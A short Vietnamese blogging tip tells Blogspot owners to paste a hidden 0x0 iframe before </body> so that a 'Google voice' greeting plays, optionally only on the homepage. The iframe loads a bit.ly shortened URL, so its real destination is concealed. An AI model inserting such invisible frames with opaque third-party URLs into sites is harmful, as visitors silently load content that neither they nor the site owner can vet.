Thủ thuật thêm giọng nói của Chị Google vào blogspot của bạn

Chào các bạn vô tình lướt trên google thì thấy thủ thuật hay nên đem về chia sẻ lại cho các bạn chưa biết. Thủ thuật thêm lời chào của Chị Google vào blog của bạn để thêm phần sinh động.
Thủ thuật thêm giọng nói, lời chào của Chị Google vào blogspot của bạn

Thực hiện

Rất đơn giản các bạn chỉ thêm đoạn mã sau trước thẻ </body> của blog mình
<iframe height='0' src='https://bit.ly/2xRMCoC' width='0'/>
Nếu các bạn chỉ muốn giọng nói phát ra ở trang chủ thì sử dụng thẻ điều kiện như sau:
<b:if cond='data:blog.url == data:blog.homepageUrl'>
<iframe height='0' src='https://bit.ly/2xRMCoC' width='0'/>
</b:if>
Xem thêm: Tổng hợp tất cả thẻ điều kiện cần thiết trong Blogspot
Các bạn có thể xem Demo ở đây!
Chúc các bạn thành công!
Nguồn: Tôi Share Blog

13/Post a Comment/Comments

Sắp xếp theo